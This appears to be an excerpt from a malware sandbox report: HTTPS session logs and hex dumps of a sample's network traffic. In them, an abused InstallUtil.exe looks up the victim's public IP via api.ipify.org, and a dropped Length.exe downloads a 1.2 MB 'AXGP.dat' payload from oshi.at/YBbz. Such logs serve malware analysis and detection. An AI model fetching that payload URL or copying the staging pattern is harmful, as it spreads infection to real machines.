                                                                                                2025-01-06 06:56:57 UTC4096INData Raw: a1 35 46 1d b7 26 4c c1 6e b1 a8 c4 2d 63 6b dc 7e 91 22 4e 0c 38 55 6d 8e 5f 82 2a 62 74 92 ee 2e fe 3a 26 e6 7d 4e c2 76 b3 61 bc 2c bc 9f 41 a1 e3 79 2d f0 b0 86 a4 37 ee 5c bc 06 b9 53 99 e0 65 5f ac 49 51 49 30 91 18 de 2e 40 ee c8 cf 70 fc 46 4a c9 97 68 4b 6d 33 17 1e c8 ac 1f 37 d1 65 7e 8a 31 dc 26 a5 1e 41 e4 d6 f0 e4 cf e0 87 eb b3 98 a8 0b 32 f3 5a 90 a2 37 1b 0b 67 ff ad 05 7e 60 eb 24 6d eb 01 a7 1f 30 e6 b3 2b e4 da 40 5a 5a 7f 9b 8c 4d a4 d5 d1 fc 69 42 e6 17 42 f8 3e e8 21 ed fd 4b dd 18 d8 01 8b c9 d2 46 a3 e0 38 ca 1b fd 82 bb 01 fb 53 20 d5 90 11 d1 e3 2e fa fa 35 2a f8 c7 89 b3 85 56 ee f9 5c 75 79 3e 27 0b 2b 64 47 81 a3 34 d8 09 2b b5 ac 59 d9 b3 74 27 9d ce 33 c8 5f 22 52 ec 3b 75 bb a0 8c c2 00 52 59 b7 00 da 15 11 83 5f 0b 01 2b
                                                                                                Data Ascii: 5F&Ln-ck~"N8Um_*bt.:&}Nva,Ay-7\Se_IQI0.@pFJhKm37e~1&A2Z7g~`$m0+@ZZMiBB>!KF8S .5*V\uy>'+dG4+Yt'3_"R;uRY_+
                                                                                                2025-01-06 06:56:57 UTC4096INData Raw: ee 29 fd 5c 58 56 6e 92 a1 f4 83 df 2d 44 20 19 ae c6 d7 30 08 2d f9 6d 65 cd f2 b8 06 5a a4 40 2e 49 be db 43 d4 80 8b 78 88 2e 61 83 d9 80 7f c5 39 ca c4 68 e9 32 fa 7e 17 0b 6e 00 69 a6 33 7d 6b 12 d8 40 01 24 3f bb 1e 07 15 c3 93 dd 21 94 e2 99 70 43 8a 42 e9 3c d7 23 d3 43 b5 5d 48 9d ea cc bb e3 8e f7 9a 26 6b 18 2f 02 08 3a 5f a3 b9 e6 52 43 ef 51 f2 b0 3b 07 e8 18 17 4a 3e b0 05 40 e0 72 e6 2a c7 9e 52 4c 04 a9 d7 ec 07 a4 d2 4f 37 03 07 3b 10 91 40 e4 dd b2 6a 4d 49 87 9e d7 ff 80 31 ee b5 c8 31 67 98 73 78 5d 45 e8 74 ef 0f d8 cd b9 06 38 c9 56 41 88 e4 40 1d 65 94 1f 22 a5 fc e1 2a f6 b0 21 34 68 22 e9 fd e5 fa 1d b8 5d c7 70 7e ef 5d 49 4c 91 18 fb b9 c5 a5 e5 fd b6 f1 b8 73 4c d4 52 34 f8 d4 c6 eb 6e a7 f2 96 62 37 5f 74 5f 38 a2 2b e8 db 2b
                                                                                                Data Ascii: )\XVn-D 0-meZ@.ICx.a9h2~ni3}k@$?!pCB<#C]H&k/:_RCQ;J>@r*RLO7;@jMI11gsx]Et8VA@e"*!4h"]p~]ILsLR4nb7_t_8++
                                                                                                2025-01-06 06:56:57 UTC4096INData Raw: fc e1 c0 cd 3f cd 0e 24 3b 58 7c e8 1c 71 54 87 7b e3 46 2f 78 c3 fa 30 ea fd 04 62 31 54 d9 39 32 99 1f d1 11 fb 1a ce 6d e2 20 3a e8 47 ce 80 3b 72 d1 88 65 4d 8d 87 28 b9 32 be 46 bf 5a bd d6 b4 b2 2a 7d f1 f5 09 95 0e 99 7f 1a 91 60 b1 03 30 e8 cd 4b 8e dc cc 40 be 91 1c 6f 98 56 bb 45 24 68 8c 8c 8d a8 50 3d 77 e7 41 d2 9a 57 6c a0 00 a6 b8 36 11 e1 f1 d7 c6 fd ac 41 0c 1c 8d c6 4d 9d 7e 7e 58 d9 2b 4f e1 ec 28 3b 6e a7 db a2 60 83 50 97 d6 59 a5 dc b5 75 6d 1c d2 c7 96 ca e5 f3 03 8e 22 af 8c 80 f2 fd bd 44 0e 33 c0 cf c7 ef ef 23 37 86 c4 61 73 22 01 34 be 60 a5 a4 0f 08 db 83 89 c2 27 a7 cb 0f 77 c7 17 8a 1f d3 8e e1 95 50 f2 a0 ac c3 65 ca 5c 80 1e d5 26 74 27 09 9b 53 8a 23 90 50 72 b5 7f f1 1b 74 e0 06 cb 88 91 2f 9a 3a f1 f7 70 a9 be 66 f2 ce
                                                                                                Data Ascii: ?$;X|qT{F/x0b1T92m :G;reM(2FZ*}`0K@oVE$hP=wAWl6AM~~X+O(;n`PYum"D3#7as"4`'wPe\&t'S#Prt/:pf
                                                                                                2025-01-06 06:56:57 UTC4096INData Raw: 75 b0 15 e3 c8 e0 7e cd c9 70 b1 de 05 ad 25 94 11 c6 34 53 81 48 b7 d1 c4 9f db ec e4 f5 e0 e6 ee 0f 8d 19 49 a6 3f ba de bd 32 44 35 46 91 5c 7c f3 a3 fe 4f eb 16 f1 19 33 cb 8f 9b ee b9 cf 97 a5 99 eb 43 35 d9 97 09 63 ef 3f 8c 27 9b 53 6e 69 a4 ee b8 41 5f f8 f3 b3 fd 16 3c 67 c8 99 76 40 73 22 75 95 24 15 b3 47 d5 c8 c0 af cd d1 bc 74 14 1f 0e be fd d3 70 4b 54 99 6a d4 28 de e5 c3 31 a2 c3 f7 56 0f c1 77 91 4c 6b 6b 3f 52 c9 a5 bf fc 9b 00 4c 05 2c 6e bb 07 c9 5b 6a 74 7c ba 5f a8 6f 6b 74 7c e4 5c 43 20 74 6d 21 a8 fa ff 72 b1 4f 4d 1d 9a 23 f3 75 f8 01 87 8a 6c ef 49 f0 d1 4c 65 bb 3c 2e f1 b0 cd 6c fe 63 b6 7f fc c2 26 13 53 69 e5 19 1f 91 fc 2e a6 67 f6 9c 31 54 93 9c 9b 52 06 aa 6d ef 8b 54 ff e0 17 6b 4d 3a 84 c9 f7 b5 0c f8 5a 7b 40 1e 9f c7
                                                                                                Data Ascii: u~p%4SHI?2D5F\|O3C5c?'SniA_<gv@s"u$GtpKTj(1VwLkk?RL,n[jt|_okt|\C tm!rOM#ulILe<.lc&Si.g1TRmTkM:Z{@
                                                                                                2025-01-06 06:56:57 UTC4096INData Raw: dd f8 9e ac 61 0e 0f 6b 1a be 56 a2 d9 26 00 f8 57 c5 14 2e f5 9d 53 2b a9 54 99 23 b6 1d cc b6 c3 b8 92 55 e0 e2 c6 6a d0 61 f3 fe cf 44 98 e9 b8 63 e1 16 1d 68 f4 5a e4 d1 fc 57 f8 b0 43 58 61 5b 35 43 45 e9 cb b4 d9 53 a9 cf c1 cd 8e c3 85 37 d8 b6 3d 81 43 a8 b0 4d 00 7d f1 05 80 ad 98 3c f0 09 41 20 b7 d9 52 2b bb 63 4f 68 9c 62 94 b2 3f 9a b0 cf b5 fe 89 3b 75 69 b1 b3 7d 3e 70 45 1d 0b 70 b7 4f 2f 0c 34 f3 d6 66 0e 33 ad 94 80 5a 6a 40 34 68 38 fe c5 10 b5 74 88 18 07 7e e6 8f 81 05 dc 64 fa a2 eb 9f ca 04 7f 2c cd cb 99 e9 96 17 76 b7 62 35 2a 5b 61 a8 78 41 a8 3b b1 e7 32 46 c8 6a 0a 76 6c ea 54 27 32 1e 13 fa 38 63 9a 12 71 51 d8 7e 28 4d a6 3a 60 26 20 54 dd 4b 27 4f e8 33 11 3e 2c 1a 7c 97 27 03 0b 46 bd a9 69 5c 8c b3 ff 7c 8b 9c 9a 53 a3 b5
                                                                                                Data Ascii: akV&W.S+T#UjaDchZWCXa[5CES7=CM}<A R+cOhb?;ui}>pEpO/4f3Zj@4h8t~d,vb5*[axA;2FjvlT'28cqQ~(M:`& TK'O3>,|'Fi\|S
                                                                                                2025-01-06 06:56:57 UTC4096INData Raw: 80 70 b5 cc 6d 10 26 d4 ba 41 21 c0 9e 46 d7 aa 15 2d 59 0e 95 55 15 98 23 ce 18 bd 77 6c 27 12 cc b4 65 1a 0e 2b 76 8d 8c 22 e5 e9 a5 e1 40 fe dd be 19 4c 85 a5 d3 81 2d 0e be f9 0c b2 32 b2 f1 6f d5 18 d2 6f f9 ee 93 0f 75 96 7d 75 5f b4 7d c2 37 d8 74 6f a9 9d 5c c8 b7 ca 40 d0 2c 67 6f 2b 07 69 4d 32 c8 90 11 c9 8f 74 a9 9a e7 01 dd 38 14 54 8a 30 b5 ff 02 df d0 18 10 f6 3c b1 a9 da 3e ad 00 33 f3 b4 98 86 bf 25 9a 30 55 0c 93 f2 4c 0a fa 26 41 c2 fd 66 86 65 e9 45 8d 53 18 95 4f a6 68 0b 2c 83 c9 a9 9e 4d 71 8b cc 2e 1b aa 40 3d 8b 71 7a c8 25 d6 2d 9c 8b e5 64 b6 b4 13 52 ab 26 d0 b8 b7 ca 95 70 41 64 cc 8a db 85 64 a9 52 17 70 24 0f d0 9e 85 a7 86 11 76 83 7e 2b 1f 27 f0 74 e9 c8 d2 bb a9 a1 9b d4 31 14 74 6b 3b 92 b6 d9 4d e5 77 6c 41 69 7c f7 a0
                                                                                                Data Ascii: pm&A!F-YU#wl'e+v"@L-2oou}u_}7to\@,go+iM2t8T0<>3%0UL&AfeESOh,Mq.@=qz%-dR&pAddRp$v~+'t1tk;MwlAi|


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.661094104.26.12.2054436932C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 06:57:13 UTC155OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                Host: api.ipify.org
                                                                                                Connection: Keep-Alive
                                                                                                2025-01-06 06:57:13 UTC424INHTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 06:57:13 GMT
                                                                                                Content-Type: text/plain
                                                                                                Content-Length: 12
                                                                                                Connection: close
                                                                                                Vary: Origin
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fd9d00afbe58c29-EWR
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1995&rtt_var=754&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1445544&cwnd=188&unsent_bytes=0&cid=cb2a3f0928f71f8b&ts=197&x=0"
                                                                                                2025-01-06 06:57:13 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                Data Ascii: 8.46.123.189


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.6611065.253.86.154431364C:\Users\user\AppData\Roaming\Length.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 06:57:24 UTC186OUTGET /YBbz HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                Host: oshi.at
                                                                                                Connection: Keep-Alive
                                                                                                2025-01-06 06:57:25 UTC317INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 06 Jan 2025 06:57:24 GMT
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Length: 1223688
                                                                                                Connection: close
                                                                                                Content-Disposition: attachment; filename=AXGP.dat
                                                                                                ETag: "a6db55e686be5ecbf68d759d0c4a9c0f"
                                                                                                Accept-Ranges: bytes
                                                                                                Last-Modified: Sun, 05 Jan 2025 23:17:21 GMT
                                                                                                2025-01-06 06:57:25 UTC3766INData Raw: 69 a0 a8 dc 4f a4 0e 98 0f 3e d2 2c d5 1a 70 d4 6b cb 8e d4 c9 a6 48 96 dc 87 93 94 0f eb 43 a0 4d 49 94 20 e6 38 e2 92 1a a0 fa 16 c2 ed bb 6d 78 70 e1 89 3d 75 3f 0e b4 ca 0e 9e 75 c2 97 9b cb c2 df e1 aa c7 a4 4c 68 de de 33 b1 1b 6b fe 88 bd 3e 1d 37 27 da e9 a7 a7 a2 77 d0 69 31 9b 47 ab 86 6c 20 d2 91 2b 7f 9f b6 ad 76 28 cb 75 37 35 74 e9 f2 3d 15 54 68 74 e2 4b e3 25 15 5b b5 ea d6 6e 22 1e 7f d9 d0 73 38 7d 8e c5 86 5a 44 f6 5e de 1d ab 21 09 7a b2 ad c8 af ea 00 a3 49 6f 85 bb cf 49 33 ad 90 3b 96 33 9a 6a f1 ab 0d 14 f8 28 5c 18 04 69 6d 20 b5 af 65 cd 56 8c 75 55 ac 87 b8 d4 8a 58 ba 79 f6 aa 33 90 17 b7 63 f3 4c 99 d1 41 01 11 61 69 23 be 5b 85 14 2f 89 8f 93 bc 1c ed d8 e6 e6 0b 06 f6 01 33 93 2b 29 ac 06 fb ae b2 a1 1b 30 74 1c df e0 5d 24
                                                                                                Data Ascii: iO>,pkHCMI 8mxp=u?uLh3k>7'wi1Gl +v(u75t=ThtK%[n"s8}ZD^!zIoI3;3j(\im eVuUXy3cLAai#[/3+)0t]$
                                                                                                2025-01-06 06:57:25 UTC4096INData Raw: a1 9d fd df 6e cf 45 74 f5 d7 6a 84 a3 76 2d c7 0a d6 ac 61 4c 6b 1e 89 ae 48 bf bf 60 e8 ee 2f fb da 40 03 c7 31 c0 35 b3 ec 29 aa 08 25 e3 e5 79 60 84 f7 94 63 08 5f 9e ed 7f 8e ba 21 49 9d 66 1d 77 22 d9 51 01 50 d0 38 f0 e9 b2 e6 15 a7 1f 12 b0 57 3d 6a 85 78 62 4e af e2 b0 23 29 e7 1c 02 2a 61 18 eb e4 ed b3 97 9e ba c8 a8 d2 d1 cd 00 54 d4 9d eb 86 63 f4 0f c6 30 a8 25 b2 21 da fc 0b 1a 46 b5 99 32 c3 e5 3c 43 11 4a d9 18 74 fd cd af 13 c0 e0 7f da 2f 35 64 79 da 2f 3d 03 02 13 ad af b6 30 4c 09 5a 8c ce a1 17 38 bb ca 63 cd 45 1e da 05 87 44 d0 e4 0c d3 9b 3f 37 14 da ce a6 5e c9 1b f4 e5 14 34 41 6f 4f c5 44 eb 26 7d ff 99 e2 3c af 80 c5 1e 15 a6 08 e2 66 c7 aa d9 2f f9 cb be a4 3b b7 72 9f e2 f0 a9 d0 73 9e 4a e6 75 ba 01 e0 f5 29 39 7c f7 9e e4
                                                                                                Data Ascii: nEtjv-aLkH`/@15)%y`c_!Ifw"QP8W=jxbN#)*aTc0%!F2<CJt/5dy/=0LZ8cED?7^4AoOD&}<f/;rsJu)9|
                                                                                                2025-01-06 06:57:25 UTC4096INData Raw: 49 8c 8d 9a a2 22 d0 e6 57 a7 84 be 79 cd 40 e1 96 d4 73 8d f9 68 90 17 e5 2f f6 8d a3 7e d7 2e ab be d7 d2 d6 31 92 8e fc 99 e3 ff f6 73 1f 20 83 3b ca 9d 2c 4e 15 b8 33 32 85 e4 92 c4 6c 05 80 bc 03 b9 11 f6 89 f2 de e1 70 83 92 81 cb a9 36 30 98 c5 f4 ea 87 49 9b 82 04 54 65 67 54 a3 d3 aa 92 85 0d 58 5c 02 d4 57 ff 61 27 92 d2 cb bc 8d d1 63 39 77 0b 0f df 18 7b d3 37 6e 4a d6 85 ca 3a 30 d4 a7 da 6f 65 b5 0e 70 b4 de bb d8 10 c3 c5 1c ea 73 c1 ef c4 bb 56 a1 09 77 f5 d5 51 01 ff ae e5 69 bf d4 8a 4b b7 39 1e 2d 7f 7e f4 66 f8 be 4d ec e8 c5 45 79 66 4c a4 7b 50 13 be 0e 80 6f d4 ae 53 e4 2b f8 29 d4 78 e4 0b 6e e8 66 53 39 00 46 01 8c bc 35 e5 50 ce 47 dd 9b d5 b6 87 25 36 16 47 f8 6c 5c 66 26 9f 8f 1f 2e f3 3a d4 56 a8 66 b5 44 12 a4 c0 03 c0 d6 e6
                                                                                                Data Ascii: I"Wy@sh/~.1s ;,N32lp60ITegTX\Wa'c9w{7nJ:0oepsVwQiK9-~fMEyfL{PoS+)xnfS9F5PG%6Gl\f&.:VfD
                                                                                                2025-01-06 06:57:25 UTC4096INData Raw: 31 46 1b 4a b7 49 f9 6a 47 52 98 83 1d 1e 94 df a5 ca 5e ce 28 0e 26 1d 01 83 c0 f0 c6 b8 34 cb a8 df db 08 f2 64 e9 32 28 db ac 12 4e f1 b8 f3 fe 1b 13 58 93 86 9c 3b 5b a9 b6 bb 00 bd a7 76 ab e6 5b b5 af b3 cb 4b ac 67 f6 1c d8 a1 b5 6f 09 49 e6 a5 b1 89 ab be 08 2b 43 95 03 75 92 8f ab 18 f6 ad 4c b6 83 e4 b5 0c 32 2c f7 a3 9c 39 00 19 26 9f 28 b6 0f 21 12 58 ad b4 90 5d 95 72 69 a6 bf fb fb b9 89 1b 04 ca d7 55 be 94 5b 8b da 36 6b 16 57 e9 21 20 21 29 ff 20 79 5d 2b 68 59 f3 4f 5c 75 6a a9 37 9d 07 da 81 23 c6 d2 33 e0 eb d8 75 7b cb f4 a8 11 5c d3 a3 bb c2 4e d2 fe 33 57 86 f7 31 e0 71 44 33 2a ec 5b a2 6b 03 d5 e6 82 79 85 fc 5a c7 00 64 4e 11 97 ae ea 03 06 86 b2 c5 7e b2 75 88 12 8f 9c f5 60 cc 7a 2f 22 25 a4 aa 76 65 69 d0 24 cf 4d 18 0a de 86
                                                                                                Data Ascii: 1FJIjGR^(&4d2(NX;[v[KgoI+CuL2,9&(!X]riU[6kW! !) y]+hYO\uj7#3u{\N3W1qD3*[kyZdN~u`z/"%vei$M
                                                                                                2025-01-06 06:57:25 UTC4096INData Raw: 01 f4 a4 e7 0e 97 7c 31 e8 bb 68 1c d1 b4 47 f1 74 e1 22 d2 52 23 9b 1e 95 18 6d ba a4 f3 b9 2f 96 61 dd d7 8a e7 86 45 7d 3b aa da e3 c9 d3 d8 42 5c 1e 26 dd 19 ef e1 25 aa ba 8b 6e dc 3d fd bb 55 85 46 76 fc b8 04 e7 ef c2 ed 7a 02 3a a2 0a 3d 78 f6 01 e4 77 db 20 d7 06 b8 41 43 77 b2 7e ff bf fd d2 35 1a cc 80 a8 2f 4a 9d cb 34 4f 1c 64 13 79 42 72 e0 b9 16 39 9e 3a 67 88 36 00 49 91 74 9c b4 fd bc 7e c2 7c d2 e3 38 9a b9 68 5e 01 99 c5 6c 1d e1 5f 6b d0 f5 4d 42 fa f8 28 f9 05 06 a3 bb fc f9 0d 5b 21 3d 3b 2f 57 75 0b 2c ff 6c f2 59 b4 ac 8f bc 9a 53 8c 6e 65 25 76 d9 2d ca 8c 31 a5 42 28 11 44 f8 dc 76 d0 63 50 43 a4 05 87 82 2f ea 73 76 93 90 e3 a5 94 aa c3 96 5d 63 22 99 34 cf a5 c6 11 a4 3a ed 06 4f 9b 42 f5 07 d7 9a 41 70 20 a1 aa 8e 01 d1 9b 7f
                                                                                                Data Ascii: |1hGt"R#m/aE};B\&%n=UFvz:=xw ACw~5/J4OdyBr9:g6It~|8h^l_kMB([!=;/Wu,lYSne%v-1B(DvcPC/sv]c"4:OBAp
                                                                                                2025-01-06 06:57:25 UTC1408INData Raw: 01 d8 cb c2 8d 30 b0 67 34 85 4c b9 d3 58 09 b1 37 08 be d5 c3 56 8d 19 47 02 ee d9 1a b8 f5 7e a8 14 66 c7 20 39 53 eb 84 9b 8e 80 9d 3f 53 cc 9a 16 d2 41 a5 1b 58 19 51 95 a5 b4 03 60 71 aa 0f 72 e2 aa c9 56 25 b4 59 86 ad fb 60 71 4c ae 31 8b 72 7e 0a 05 7b 29 b7 3b 4d 37 4c 43 90 c6 ef e5 43 37 50 32 00 1b 9f 9e f4 27 4e af d5 f9 d1 c1 57 ba 5c ff 9c d6 1e 56 66 4b d7 83 f5 a1 11 42 1e e3 5b 86 34 1c 99 1c 03 9f 9f 34 e8 97 6c 37 e1 57 fb 57 be 3d 80 d8 c1 6d c4 28 bb f2 f3 f1 65 c3 76 05 1f 5c 47 66 b5 86 18 b6 fb fb 9e 24 78 f2 9b 06 53 35 a0 f7 a2 82 9a da 43 52 4b f2 60 40 d6 39 4c eb c6 a6 a0 60 d2 58 87 61 5b f0 a2 7a 20 c8 cb 59 02 cb 0d b3 97 d8 00 69 3b 1a 2e 97 ff 23 b8 d8 23 d8 e0 73 8c 13 49 ee 57 dd 55 f2 33 e7 0b 31 70 51 62 29 1a 61 21
                                                                                                Data Ascii: 0g4LX7VG~f 9S?SAXQ`qrV%Y`qL1r~{);M7LCC7P2'NW\VfKB[44l7WW=m(ev\Gf$xS5CRK`@9L`Xa[z Yi;.##sIWU31pQb)a!
                                                                                                2025-01-06 06:57:25 UTC826INData Raw: 81 dd 67 5a 7b f3 24 93 29 a3 5c a4 a9 a6 f4 cf d2 9f 0c bc a1 54 d8 c7 15 1f a3 15 18 a4 c2 78 5c 6b e4 9c f4 86 fc 85 9e 7e 08 ef ed 22 0a 38 4e e3 a6 b5 6c 2f 8f 82 71 5c b9 06 51 2f 32 20 25 2d 40 e6 1b 73 81 c6 0b a2 3d d1 5a b8 94 ea 11 30 02 04 3c 69 33 74 c9 46 86 d9 6c e8 24 17 0a 03 4f c6 84 a2 9c e8 09 34 43 6c 5c aa 36 ce 90 0e 92 af e7 cd 90 97 98 88 ae 6b 1b 95 d1 2e f5 ff ec fd c3 b6 7f 03 0b 17 e6 5b 1a bd d0 2f bb 2f fb b2 3c 52 53 f7 58 bb 7f 41 82 35 33 46 99 17 4e 49 0e fc 77 83 44 80 64 6e 14 14 93 68 bc 08 e2 c4 82 db c5 bb b8 58 89 8d 72 4b 5c 17 95 f6 ae ef 47 a3 5d c8 73 9e 98 97 a7 4c aa 3f 67 33 0a 17 af 1a 77 2b 76 41 47 bf 09 27 0e 2e 50 32 ae 55 b7 a9 3a 19 f8 18 ab e7 43 a2 d8 2d e0 63 95 e4 a1 40 19 6f 6f 61 3f 56 32 8a 61
                                                                                                Data Ascii: gZ{$)\Tx\k~"8Nl/q\Q/2 %-@s=Z0<i3tFl$O4Cl\6k.[//<RSXA53FNIwDdnhXrK\G]sL?g3w+vAG'.P2U:C-c@ooa?V2a
                                                                                                2025-01-06 06:57:25 UTC1335INData Raw: c8 84 48 f4 2a 11 c7 b3 3e ca e6 5a 22 aa 3f 8a 28 4e 1a 1f 15 1a ed cb d0 e2 b9 7e eb c1 00 2f 7f 0e d9 75 a1 82 7f 9f 1f ab d4 65 7a ba 37 1d fb f9 54 00 e0 60 62 fa 78 cf 46 da b1 1b d0 c5 af a6 52 9a bb 32 3b 40 0d 0b 95 dd 9f 2c 51 cd e8 47 22 3d 45 ab 8f 7b a8 97 67 95 87 ca 11 2b e3 b1 b0 38 e6 8c b3 6c ac 57 62 f1 55 e5 78 32 88 ab 6e 66 c9 a3 2b 67 36 76 f4 f8 4e 49 d5 b1 a7 42 d2 82 8b de f0 d3 6b e0 2d 59 cb c3 64 5f 37 85 09 48 19 0e 1f 55 70 4a 64 3d 01 52 5a 5e 89 84 48 aa 1e 3a 6d 85 af d2 83 b0 d8 aa f7 42 e5 81 48 8f eb d6 77 74 99 a2 87 8c 93 58 22 25 b0 d0 44 70 03 3d 23 eb 3e 83 47 0e ca f8 d5 d1 79 2b 25 c2 22 a2 84 d6 59 42 70 53 ce f9 d2 aa 9e 40 3f 34 ba d3 38 7c a5 0d 41 e9 26 bf b7 08 71 c2 8c 68 09 3d 26 e3 e8 e0 5a bc e4 66 c3
                                                                                                Data Ascii: H*>Z"?(N~/uez7T`bxFR2;@,QG"=E{g+8lWbUx2nf+g6vNIBk-Yd_7HUpJd=RZ^H:mBHwtX"%Dp=#>Gy+%"YBpS@?48|A&qh=&Zf
                                                                                                2025-01-06 06:57:25 UTC4096INData Raw: ff 1d 29 28 6b ef 6a c6 95 3d e1 07 45 19 15 9e db 9e 61 bb cc ff 2c d8 55 f6 43 c3 a7 45 a8 14 1f a4 e2 3d e0 5b e5 5a ac 2f 68 78 eb 3f 1b f2 cf 25 f8 60 fc c8 72 ea 71 34 65 5a 34 1a b9 02 9b 33 6c 35 3c fe 49 ed 00 1a 97 ae ec 3e ee 42 c0 51 8c df f6 ac 75 5e 67 78 1b 9d 6b 24 33 8d 4e cc 94 bb 90 5c eb f1 61 52 49 d5 ca 2e b5 9a 84 63 31 5d 64 97 36 13 d5 1b ab 9e ba 7d eb c3 38 1f 6b b6 75 1f 85 1e f4 a2 89 fd 98 a0 e8 3c 7e 62 ff 82 2f cb 7f 37 85 e5 6f 13 44 bc 5c ff 8a 3f 14 89 c8 0e 5f 4a 35 51 f6 eb 90 b6 2b 44 40 9d 55 2a 0f a8 65 21 7d a4 e2 e4 19 13 a9 39 3a ac 9a 1c 64 4b b5 a7 8d 8d f2 8f db 78 3c e3 15 da 18 c5 d7 1c ee b0 16 1f c3 45 4b 0b 8b e8 f7 3e 87 46 19 dd 0b 2e e5 50 0a c8 f6 2b 7f 2c 38 01 3b 6b f8 c1 d3 a8 50 e2 e1 5a c9 31 14
                                                                                                Data Ascii: )(kj=Ea,UCE=[Z/hx?%`rq4eZ43l5<I>BQu^gxk$3N\aRI.c1]d6}8ku<~b/7oD\?_J5Q+D@U*e!}9:dKx<EK>F.P+,8;kPZ1
                                                                                                2025-01-06 06:57:25 UTC4096INData Raw: 51 cd 27 9f c7 5a 06 57 e1 f8 8a ce 1c cc 11 7e 11 ea c4 cc fc 91 b3 16 97 2a 5a e9 8a 84 d3 74 d5 13 e3 ed 20 28 f8 22 05 f3 4e 1a 95 6a 9d 9b 30 a2 10 26 74 2b e8 86 2f f0 c0 5d e9 41 4c 82 12 ba 8a 90 4b c7 8e 69 69 f5 87 66 2a 68 ee 32 30 6d 3a 14 3f 68 08 87 80 c1 6e 63 5b a4 52 32 73 91 4f 17 fe db 78 7f 22 4c 00 5d 25 39 e2 ef 15 5a bd 25 f5 39 c0 8d 40 19 cd f2 a7 f4 bb a2 f9 78 9b a3 f6 88 06 3f 63 09 58 99 dd 69 29 21 83 04 ad b1 0c 84 cf f1 17 d7 93 ca 88 e8 d2 f1 f9 0b 95 2f 92 62 98 f5 ef 5b 09 9a 67 4c d0 ce a2 d7 85 5d 92 d5 be 95 a6 4e 12 17 7d d2 d3 0e 7d fe c4 a1 36 b4 91 48 1d 32 0c 04 97 94 e0 e0 b1 87 c5 b9 bf 5f b2 d7 87 6f 2d 2c 72 a2 96 ad 7b 47 a8 26 08 ac e5 b9 46 16 71 aa e5 4b b8 21 f2 be 14 d3 40 6c 72 bc 9b e3 b6 6c 1e 1e cb
                                                                                                Data Ascii: Q'ZW~*Zt ("Nj0&t+/]ALKiif*h20m:?hnc[R2sOx"L]%9Z%9@x?cXi)!/b[gL]N}}6H2_o-,r{G&FqK!@lrl


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.6611135.253.86.154431364C:\Users\user\AppData\Roaming\Length.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 06:58:39 UTC162OUTGET /YBbz HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                Host: oshi.at
                                                                                                2025-01-06 06:58:44 UTC317INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 06 Jan 2025 06:58:44 GMT
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Length: 1223688
                                                                                                Connection: close
                                                                                                Last-Modified: Sun, 05 Jan 2025 23:17:21 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                ETag: "a6db55e686be5ecbf68d759d0c4a9c0f"
                                                                                                Content-Disposition: attachment; filename=AXGP.dat
                                                                                                2025-01-06 06:58:44 UTC3766INData Raw: 69 a0 a8 dc 4f a4 0e 98 0f 3e d2 2c d5 1a 70 d4 6b cb 8e d4 c9 a6 48 96 dc 87 93 94 0f eb 43 a0 4d 49 94 20 e6 38 e2 92 1a a0 fa 16 c2 ed bb 6d 78 70 e1 89 3d 75 3f 0e b4 ca 0e 9e 75 c2 97 9b cb c2 df e1 aa c7 a4 4c 68 de de 33 b1 1b 6b fe 88 bd 3e 1d 37 27 da e9 a7 a7 a2 77 d0 69 31 9b 47 ab 86 6c 20 d2 91 2b 7f 9f b6 ad 76 28 cb 75 37 35 74 e9 f2 3d 15 54 68 74 e2 4b e3 25 15 5b b5 ea d6 6e 22 1e 7f d9 d0 73 38 7d 8e c5 86 5a 44 f6 5e de 1d ab 21 09 7a b2 ad c8 af ea 00 a3 49 6f 85 bb cf 49 33 ad 90 3b 96 33 9a 6a f1 ab 0d 14 f8 28 5c 18 04 69 6d 20 b5 af 65 cd 56 8c 75 55 ac 87 b8 d4 8a 58 ba 79 f6 aa 33 90 17 b7 63 f3 4c 99 d1 41 01 11 61 69 23 be 5b 85 14 2f 89 8f 93 bc 1c ed d8 e6 e6 0b 06 f6 01 33 93 2b 29 ac 06 fb ae b2 a1 1b 30 74 1c df e0 5d 24
                                                                                                Data Ascii: iO>,pkHCMI 8mxp=u?uLh3k>7'wi1Gl +v(u75t=ThtK%[n"s8}ZD^!zIoI3;3j(\im eVuUXy3cLAai#[/3+)0t]$
